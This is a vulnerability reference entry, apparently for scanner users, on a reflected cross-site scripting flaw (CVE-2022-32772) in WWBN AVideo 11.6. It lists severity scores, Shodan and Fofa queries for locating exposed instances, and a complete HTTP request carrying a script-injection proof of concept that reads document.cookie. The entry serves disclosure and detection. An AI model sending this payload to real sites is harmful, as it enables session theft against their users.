| Title | WWBN AVideo 11.6 - Cross-Site Scripting |
|---|---|
| Author | arafatansari |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. |
| Remediation | Upgrade to the latest version to mitigate this vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.07208 |
| CVE ID | CVE-2022-32772 |
| CWE ID | CWE-79 |
| Shodan Query | http.html:"AVideo"http.html:"avideo" |
| Fofa Query | body="avideo" |
| Tags | cve2022 cve avideo xss wwbn vuln |
WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the ‘msg’ parameter, which is inserted into the document with insufficient sanitization.
GET /index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-32772.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-32772.pcap
N/AN/A